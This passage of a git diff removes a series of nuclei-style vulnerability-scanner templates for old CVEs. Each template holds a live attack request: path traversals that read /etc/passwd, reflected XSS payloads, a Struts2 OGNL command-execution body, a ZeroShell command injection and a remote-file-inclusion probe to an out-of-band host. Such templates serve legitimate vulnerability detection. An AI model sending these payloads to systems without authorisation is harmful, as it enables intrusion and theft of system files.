- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2006-2842
|
||||
|
||||
info:
|
||||
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
|
||||
reference: https://www.exploit-db.com/exploits/27948
|
||||
tags: cve2006,lfi,squirrelmail,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Rainbow.Zen Jira XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2007-4556
|
||||
|
||||
info:
|
||||
name: Apache Struts2 S2-001 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference: https://www.guildhab.top/?p=2326
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.action"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2007-5728
|
||||
|
||||
info:
|
||||
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
|
||||
tags: cve,cve2007,xss,pgadmin,phppgadmin
|
||||
reference: https://www.exploit-db.com/exploits/30090
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert("document.domain")</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2008-2398
|
||||
|
||||
info:
|
||||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm('xss')>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2008-2650
|
||||
info:
|
||||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference: https://www.exploit-db.com/exploits/5700
|
||||
tags: cve,cve2008,lfi
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-4668
|
||||
|
||||
info:
|
||||
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-4764
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-5587
|
||||
|
||||
info:
|
||||
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/exploits/7363
|
||||
tags: cve2008,lfi,phppgadmin
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6172
|
||||
|
||||
info:
|
||||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,20 +0,0 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,28 +0,0 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde - Horde_Image::factory driver Argument LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
tags: cve,cve2009,horde,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,24 +0,0 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion 8 linked XSS vulnerabilies
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference:
|
||||
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_album 1.14 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi,photo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <= 1.1b2 RFI
|
||||
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2009,krweb,rfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi,nexus
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
